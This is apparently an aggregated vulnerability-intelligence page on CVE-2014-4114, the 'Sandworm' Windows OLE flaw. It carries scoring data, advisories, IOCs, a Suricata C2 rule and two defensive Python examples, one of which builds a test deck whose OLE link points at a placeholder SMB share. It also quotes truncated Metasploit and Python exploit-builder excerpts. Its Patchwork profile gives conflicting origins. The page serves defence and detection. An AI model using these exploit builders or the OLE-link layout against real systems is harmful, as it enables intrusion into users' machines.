CVE-2014-4114
published 2014-10-15
Priority P1 · 90 · high · CVSS 3.1 7.8
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · due 2022-03-24
Exploited in the wild
EPSS 81.63% (99.6th percentile)
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
Detection & IOCs (extracted from sources)
Snort SID 32186
- The exploit embeds two OLE objects in a malicious PowerPoint file: a .inf file and an executable. The .inf file modifies the host and launches the malicious executable; a registry key is added for persistence after reboot.
- Malware signatures Trojan.Mdropper and Backdoor.Lancafdo.A are associated with the Sandworm/CVE-2014-4114 campaign and can be used as AV/SIEM detection criteria.
- The Recorded Future hash (MD5) and IP were extracted from social media (tweets) at the time of initial disclosure and may represent early-stage, unverified IOCs; the IP was reportedly removed from Twitter shortly after posting.
- The Talos IP list covers infrastructure observed at the time of initial exploitation (October 2014); these IPs may have rotated or been reassigned since then.
- Windows XP is explicitly not affected by CVE-2014-4114; detection and patching efforts should focus on Vista SP2 and later supported versions.
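The two-object layout described above (an INF plus an executable delivered through an OLE Package object, with the Metasploit module further down this page hosting the INF and GIF on an SMB share) gives a static triage check that does not need Office: a slide relationship of type oleObject with TargetMode="External" pointing at a file:// or UNC path, and OLE compound files under ppt/embeddings/. The scanner below is an added example, not code from Talos, Exploit-DB or the Metasploit project; the deck it scans is constructed in memory, and the host 10.0.0.5 and share name are placeholders.

```python
"""Triage a .pptx/.ppsx for the OLE Package layout used by the
CVE-2014-4114 documents: external oleObject relationship targets and
embedded OLE containers. Added example; the deck is constructed here."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
# Extensions the 2014 samples and public PoCs pointed the package at.
PACKAGE_EXTS = (".inf", ".gif", ".exe", ".scr", ".bat", ".cmd")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE compound file header


def scan_pptx(data: bytes) -> dict:
    """Return embedded OLE containers and external relationship targets."""
    findings = {"embeddings": [], "external_targets": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.startswith("ppt/embeddings/"):
                blob = zf.read(name)
                findings["embeddings"].append((name, blob.startswith(OLE_MAGIC)))
            elif name.endswith(".rels"):
                root = ET.fromstring(zf.read(name))
                for rel in root.iter("{%s}Relationship" % REL_NS):
                    # OOXML relationships are Internal unless stated otherwise.
                    if rel.get("TargetMode", "Internal") != "External":
                        continue
                    target = rel.get("Target", "")
                    low = target.lower()
                    if low.startswith("file:") or low.startswith("\\\\"):
                        findings["external_targets"].append(
                            (name, rel.get("Type", ""), target))
    return findings


def is_suspicious(findings: dict) -> bool:
    """True when an oleObject relationship resolves to a remote package file
    with an INF/executable extension, i.e. the CVE-2014-4114 shape."""
    for _, rel_type, target in findings["external_targets"]:
        if rel_type == OLE_REL_TYPE and target.lower().endswith(PACKAGE_EXTS):
            return True
    return False


def build_deck(malicious: bool) -> bytes:
    """Constructed minimal deck containing only the parts the scanner reads."""
    rels = [
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/slideLayout" '
        'Target="../slideLayouts/slideLayout1.xml"/>'
    ]
    if malicious:
        # Placeholder UNC path (10.0.0.5, "share"); real samples pointed at
        # attacker-controlled SMB shares.
        rels.append(
            '<Relationship Id="rId2" Type="%s" '
            'Target="file:///\\\\10.0.0.5\\share\\slide1.inf" '
            'TargetMode="External"/>' % OLE_REL_TYPE)
    rels_xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                '<Relationships xmlns="%s">%s</Relationships>'
                % (REL_NS, "".join(rels)))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
        if malicious:
            zf.writestr("ppt/embeddings/oleObject1.bin", OLE_MAGIC + b"\x00" * 504)
    return buf.getvalue()


if __name__ == "__main__":
    for label, deck in (("benign", build_deck(False)),
                        ("sandworm-shaped", build_deck(True))):
        found = scan_pptx(deck)
        print(label, "suspicious=%s" % is_suspicious(found), found)
```

The relationship check is the cheap signal: an oleObject target that leaves the package is unusual in ordinary decks, and pairing it with an INF or executable extension is what the 2014 exploit chain needed. Embedded OLE containers on their own are common in legitimate files, so they are reported but not used for the verdict.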
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | HIGH | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 7.8 | HIGH | — |
| cisa | — | 7.8 | HIGH | — |
CISA
Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2014-4114 [HIGH] CWE-20 Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
Vulnerability: Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
Affected: Microsoft Windows
A vulnerability exists in Windows Object Linking & Embedding (OLE) that could allow remote code execution if a user opens a file that contains a specially crafted OLE object.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-4114
Remediation Due Date: 2022-03-24
GHSA
GHSA-3hff-6c4j-j2w5: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8
ghsa_unreviewed·2022-05-14
CVE-2014-4114 [HIGH] CWE-20 GHSA-3hff-6c4j-j2w5: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
VulnCheck
Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
vulncheck·2014·CVSS 7.8
CVE-2014-4114 [HIGH] CWE-20 Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
A vulnerability exists in Windows Object Linking & Embedding (OLE) that could allow remote code execution if a user opens a file that contains a specially crafted OLE object.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/; https://www.trendmicro.com/en_us/research/14/j/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm.html; https://www.cve.org/CVERecord?id=CVE-2014-4114; https://blog.trendmicro.com/trendlabs-security-intelligence/tim
VulnCheck
Microsoft Graphics Component Memory Corruption Vulnerability
vulncheck·2013·CVSS 7.8
CVE-2013-3906 [HIGH] CWE-94 Microsoft Graphics Component Memory Corruption Vulnerability
Microsoft Graphics Component Memory Corruption Vulnerability
Microsoft Graphics Component contains a memory corruption vulnerability which can allow for remote code execution.
Affected: Microsoft Graphics Component
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2013-3906; https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-096?redirectedfrom=MSDN; https://cyberwarzone.com/wp-content/uploads/2014/06/CrowdStrike_Global_Threat_Report_2013.pdf; https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/; https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf; https://www.group-ib.com/brochures/gib-buhtrap-rep
Suricata
ET MALWARE Wonton-JH Checkin
suricata·2014-10-24
CVE-2014-4114 ET MALWARE Wonton-JH Checkin
ET MALWARE Wonton-JH Checkin
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Wonton-JH Checkin"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".asp?M00="; fast_pattern; pcre:"/^\d+$/R"; http.header; strip_pseudo_headers; bsize:35; content:"Mozilla/4.0 (Compatible|3b 20|MSIE 6.0|3b|)"; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,blog.cylance.com/emerging-threat-alert-cve-2014-4114; reference:md5,37ca2ecb5e1fc89f73c6adc188ff685d; classtype:command-and-control; sid:2019502; rev:5; metadata:created_at 2014_10_24, signature_severity Major, updated_at 2024_04_29;)
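To reason about what sid:2019502 will and will not fire on, the following emulates its match conditions (POST, a .asp URI whose M00= parameter is all digits through the end of the URI, the MSIE 6.0 User-Agent string with the hex escapes decoded, and no Referer header) over hand-written HTTP requests. This is an added example, not code from Emerging Threats or Cylance; it does not reproduce Suricata's buffer semantics exactly (the bsize:35 constraint on the header buffer is not modelled, and the User-Agent check is a plain substring check), and the requests, host and path are constructed, not observed C2 traffic.

```python
"""Minimal emulation of ET MALWARE Wonton-JH Checkin (sid:2019502) match
conditions for sanity-checking the rule against constructed requests.
Added example; not a substitute for running the rule in Suricata."""
import re

# content:".asp?M00="; pcre:"/^\d+$/R" -> digits must run to the end of the URI
M00_RE = re.compile(r"\.asp\?M00=\d+$")
# content:"Mozilla/4.0 (Compatible|3b 20|MSIE 6.0|3b|)" with the hex bytes decoded
UA_NEEDLE = "Mozilla/4.0 (Compatible; MSIE 6.0;)"


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, uri, [(name, value), ...])."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, uri, headers


def matches_wonton_jh(raw: bytes) -> bool:
    """Apply the rule's content/pcre conditions in order; all must hold."""
    method, uri, headers = parse_request(raw)
    if method != "POST":                        # http.method; content:"POST"
        return False
    if not M00_RE.search(uri):                  # http.uri; content + pcre /R
        return False
    header_block = "\r\n".join("%s: %s" % h for h in headers)
    if UA_NEEDLE not in header_block:           # http.header; content:"Mozilla/4.0 ..."
        return False
    names = [n.lower() for n, _ in headers]
    if "referer" in names:                      # http.header_names; content:!"|0d 0a|referer|0d 0a|"
        return False
    return True


# Constructed requests: host and path are placeholders, not observed C2.
CHECKIN = (b"POST /ip/index.asp?M00=318720 HTTP/1.1\r\n"
           b"Host: c2.example.invalid\r\n"
           b"User-Agent: Mozilla/4.0 (Compatible; MSIE 6.0;)\r\n"
           b"Content-Length: 0\r\n\r\n")
WITH_REFERER = CHECKIN.replace(
    b"Content-Length", b"Referer: http://c2.example.invalid/\r\nContent-Length")
NON_NUMERIC = CHECKIN.replace(b"M00=318720", b"M00=abc123")
GET_VARIANT = CHECKIN.replace(b"POST", b"GET")

if __name__ == "__main__":
    for label, req in (("checkin", CHECKIN), ("with referer", WITH_REFERER),
                       ("non-numeric", NON_NUMERIC), ("GET", GET_VARIANT)):
        print("%-13s -> %s" % (label, matches_wonton_jh(req)))
```

The negative Referer test is the part most worth keeping in mind when tuning: a proxy or browser plugin that injects a Referer into otherwise matching traffic will suppress the alert, which is the trade-off the rule makes to keep browser-originated POSTs out.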
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
exploitdb·2014-11-14
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
      'Name'           => "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
to be vulnerable. However, based on our testing, the most reliable setup is on Windows
pla
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
exploitdb·2014-11-14
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
      'Name'           => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
However, based on our testing, the most reliable setup is on Windows plat
Exploit-DB
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
exploitdb·2014-11-12·CVSS 7.8
CVE-2014-6352 [HIGH] Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
---
#
# Full exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35216.rar
#
#CVE-2014-6352 OLE Remote Code Execution
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Tested on win7 - office 2007 and 2010. The exploit will not give a UAC warning if the user account is an administrator; otherwise there will be a UAC warning.
#No .inf file is required in this exploit
#The size of executable payload should be less than 400kb
#python 2.7 required
#The folder "temp" should be in same dir as this python file.
# usage - python.exe
Exploit-DB
Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)
exploitdb·2014-10-25·CVSS 7.8
CVE-2014-4114 [HIGH] Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)
Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)
---
#!/usr/bin/python
# Windows OLE RCE Exploit MS14-060 (CVE-2014-4114) Sandworm
# Author: Mike Czumak (T_v3rn1x) - @SecuritySift
# Written: 10/21/2014
# Tested Platform(s): Windows 7 SP1 (w/ exploit script run on Kali Linux)
# You are free to reuse this code in part or in whole with the exception of commercial applications
# For a demo of this PoC, see http://www.securitysift.com/windows-ole-rce-exploit-ms14-060/
import sys, os
import zipfile
import argparse
import subprocess
from shutil import copyfile
from pptx import Presentation
# Args/Usage
def get_args():
parser = argparse.ArgumentParser( prog="ms14_060.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''This scri
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
exploitdb·2014-10-20
CVE-2014-4114 Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
      'Name'           => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
as using
Exploit-DB
Microsoft Windows - OLE Package Manager SandWorm
exploitdb·2014-10-20·CVSS 7.8
CVE-2014-4114 [HIGH] Microsoft Windows - OLE Package Manager SandWorm
Microsoft Windows - OLE Package Manager SandWorm
---
#!/usr/bin/env python
import os
import zipfile
import sys
'''
Full Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35019.tar.gz
Very quick and ugly [SandWorm CVE-2014-4114] exploit builder
Exploit Title: CVE-2014-4114 SandWorm builder
Built to run on: Linux/MacOSX
Date: 17/10/2014
Exploit Author: Vlad Ovtchinikov (@v1ad_o)
Vendor Homepage: microsoft.com
Tested on: Win7Sp1 64 bit - Microsoft Office 2013 Plus
Demo: http://youtu.be/ljjEkhflpvM
CVE : CVE-2014-4114
NOTE:
expl.inf (md5 8313034e9ab391df83f6a4f242ec5f8d) + expl.zip (md5 4a39121a60cc79d211fc7f7cfe00b707)
should be located in the same dir as the builder.
01:39 cve-2014-4114.py
19:35 expl.inf
15:37 expl.zip
e.g. python cve-2014-4114.py
Metasploit
MS14-060 Microsoft Windows OLE Package Manager Code Execution
metasploit
MS14-060 Microsoft Windows OLE Package Manager Code Execution
MS14-060 Microsoft Windows OLE Package Manager Code Execution
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a failure in the CPackage::CreateTempFileName function. This module will generate three files: an INF, a GIF, and a PPSX file. You are required to set up a SMB or Samba 3 server and host the INF and G
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
## Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Tenable
Sandworm APT Deploys New SwiftSlicer Wiper Using Active Directory Group Policy
blogs_tenable·2023-01-27
Sandworm APT Deploys New SwiftSlicer Wiper Using Active Directory Group Policy
Trendmicro
Untangling the Patchwork Cyberespionage Group
blogs_trendmicro·2017-12-11
Untangling the Patchwork Cyberespionage Group
Cyber Crime
# Untangling the Patchwork Cyberespionage Group
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets.
By: Daniel Lunghi, Jaromir Horejsi, Cedric Pernet
2017/12/11
Updated as of October 9, 2018, 7:24PM PDT to remove Socksbot and update the appendix and technical brief; hat tip to Michael Yip of Accenture Security for an earlier research on Socksbot.
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets. Patchwork’s moniker is from its notoriety for rehashing off-the-rack tools and malwa
Unit42
New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
blogs_unit42·2016-04-22·CVSS 7.8
[HIGH] New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
## New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
Micah Yates, Mike Scott, Brandon Levene, Jen Miller-Osborn · Published: April 21, 2016 · Threat Research · Malware · DLL, PIVY, Poison Ivy, SPIVY
Malware writers have always sought to develop feature-rich, easy to use tools that are also somewhat hard to detect via both host- and network-based detection systems. For many years, one of the go-to families of malware used by both less-skilled and advanced actors has been the Poison Ivy (aka PIVY) RAT. Poison Ivy has a convenient graphical user interface (GUI) for managing compromised hosts and provides easy access to a rich suite of post-compromise tools. It is no surprise it’s now being used against pro-democracy organizations and supporters in Hong Kong that have long been a target of advanced attack campaigns.
Despite its simplicity and prevalence, detection rates for both AV and IDS systems has always been surprisingly low for Poison Ivy. Possibly for these reasons, since the mid-
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys
blogs_qualys·2015-05-01·CVSS 2.6
[LOW] US-CERT: Top 30 Vulnerabilities | Qualys
On April 29, 2015 US-CERT published TA15-119A, which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe software from Reader and Flash to ColdFusion, Java from Oracle and others, and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
- Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
- Internet Explorer: MS14-021 for CVE-2014-1776, Qualys ID: 100191
- MS14-012 for CVE-2014-0322
- MS13-038 for CVE-2013-1347
- MS13-008 for CVE-2012-4792
- MS10-01
Talos
Microsoft Update Tuesday November 2014: Fixes for 3 0-day Vulnerabilities
blogs_talos·2014-11-11·CVSS 7.8
[HIGH] Microsoft Update Tuesday November 2014: Fixes for 3 0-day Vulnerabilities
## Microsoft Update Tuesday November 2014: Fixes for 3 0-day Vulnerabilities
This month Microsoft is releasing 14 security bulletins. Originally they had planned to release 16, but due to issues that emerged in late testing, two bulletins that were announced in the Advance Security Notification, MS14-068 and MS14-075, have been postponed. Of the 14 bulletins, four are considered critical, eight are important, while two are moderate. They cover a total of 33 CVEs.
We’ll start off with the four critical bulletins, for a total of 21 CVEs that can result in remote code execution:
Our first bulletin of the month is MS14-064 and fixes two vulnerabilities (CVE-2014-6332, CVE-2014-6352) in Windows Object Linking and Embedding (OLE) that could allow remote code execution. Both issues are seeing attack in the wild and can be considered 0-days. CVE-2014-6352 is a vulnerabil
Talos
Weaponized Powerpoint in the Wild
blogs_talos·2014-10-16·CVSS 7.8
CVE-2014-4114 [HIGH] Weaponized Powerpoint in the Wild
## Weaponized Powerpoint in the Wild
This post was written by Jaeson Schultz.
On October 14th information related to a new Windows vulnerability, CVE-2014-4114, was published. This new vulnerability affects all supported versions of Microsoft Windows. Windows XP, however, is not affected by this vulnerability. The problem lies in Windows’ OLE package manager. When triggered it allows for remote code execution.
In this case, attackers crafted a malicious Powerpoint document. Upon execution the Powerpoint document would extract two embedded OLE objects: a .inf file, and another executable. The .inf file is used to make changes to the host system, and launch the malicious executable. A key is added to the registry to keep the malware running after a system restart. While it has been alleged that this specific attack was initia
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
## Super Tuesday: A Patch Tuesday We Won’t Forget
Ryan Olson · Published: October 15, 2014 · Threat Research · Vulnerabilities · BlackEnergy, ISight, Microsoft, Microsoft Security Bulletin, Patch Tuesday, PowerShell Empire, Sandworm
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities, Adobe issued updates for Flash and ColdFusion, and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
### Sandworm
The first to drop was the Sandworm Campaign, a report from iSight partners, which described attacks on European and American targets in the month of August using new versions of the BlackEnergy bot, but the group behind the attacks has been operating since at least 2009. The biggest news here was the group’s exploitation of a “new” vulnerability in Windows, CV
Talos
Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
blogs_talos·2014-10-14·CVSS 7.8
[HIGH] Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
## Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
This post was authored by Yves Younan
Microsoft Tuesday is here once again and this month they are releasing a total of eight bulletins. Three of which are rated as critical, while the remaining five are rated as important. There’s a total of 24 CVEs this month, 20 of which were privately disclosed to Microsoft and four which are either publicly known or under active attack, making them 0-day vulnerabilities. Of those four, two are being actively attacked, while two have been publicly disclosed but do not seem to be under attack for supported software. Of the 24 CVEs, 15 are categorized as allowing remote code execution, four as elevation of privilege and three as security feature bypasses.
The first bulletin is MS14-056 and is the IE bulletin. There’s a total of 14 CVEs and it is rated
Krebs
Microsoft, Adobe Push Critical Security Fixes
blogs_krebs·2014-10-14·CVSS 7.8
[HIGH] Microsoft, Adobe Push Critical Security Fixes
Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.
Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is appa
Zscaler
Analysis Of SandWorm (CVE-2014-4114) 0-Day | Zscaler
blogs_zscaler·2014-10-14·CVSS 7.8
[HIGH] Analysis Of SandWorm (CVE-2014-4114) 0-Day | Zscaler
Recorded Future
Discovering Sandworm Indicators with Maltego Transforms
blogs_recorded_future·CVSS 7.8
CVE-2014-4114 [HIGH] Discovering Sandworm Indicators with Maltego Transforms
# Discovering Sandworm IOCs With Recorded Future Maltego Transforms
Yesterday, iSIGHT Partners published a blog post announcing the discovery of CVE-2014-4114, a zero-day vulnerability used in a Russian cyber-espionage campaign. The campaign was dubbed Sandworm and it’s getting a ton of attention via social media as seen in the Recorded Future timeline below.
I recently outlined how to use Recorded Future Maltego transforms to discover indicators of compromise (IOCs) from OSINT so I decided to analyze the Sandworm vulnerability with a similar approach.
### Step-by-Step Outline
First, I search for the single vulnerability entity (CVE-2014-4114) mentioned in the iSIGHT report.
Then I run our VULN2RF transform
Threat Intel
BRONZE BUTLER (BRONZE BUTLER, REDBALDKNIGHT, Tick)
threat_intel·CVSS 7.8
[HIGH] BRONZE BUTLER (BRONZE BUTLER, REDBALDKNIGHT, Tick)
# Threat Actor Profile: BRONZE BUTLER
ATT&CK ID: G0060
Also known as: BRONZE BUTLER, REDBALDKNIGHT, Tick
Suspected origin: China
## Overview
BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.(Citation: Symantec Tick Apr 2016)
### Initial Access
- T1566.001 Spearphishing A
Crowdstrike
Arrests Put New Focus on CARBON SPIDER Adversary Group
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Arrests Put New Focus on CARBON SPIDER Adversary Group
Zscaler
Zscaler found Multiple Security Vulnerabilities | 10-14-2014
blogs_zscaler·CVSS 8.8
[HIGH] Zscaler found Multiple Security Vulnerabilities | 10-14-2014
Threat Intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
threat_intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
# Threat Actor Profile: Patchwork
ATT&CK ID: G0040
Also known as: Patchwork, Hangover Group, Dropping Elephant, Chinastrats, MONSOON, Operation Hangover
Suspected origin: China
## Overview
Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Cita
Threat Intel
Sandworm Team (Sandworm Team, ELECTRUM, Telebots)
threat_intel
Sandworm Team (Sandworm Team, ELECTRUM, Telebots)
# Threat Actor Profile: Sandworm Team
ATT&CK ID: G0034
Also known as: Sandworm Team, ELECTRUM, Telebots, IRON VIKING, BlackEnergy (Group), Quedagh, Voodoo Bear, IRIDIUM, Seashell Blizzard, FROZENBARENTS, APT44
Suspected origin: Russia
## Overview
Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)
In October 2020, the US indicted six GRU Unit 74455 of
arXiv
Techniques of Modern Attacks
arxiv_fulltext·2026-01-19
Techniques of Modern Attacks
## Abstract
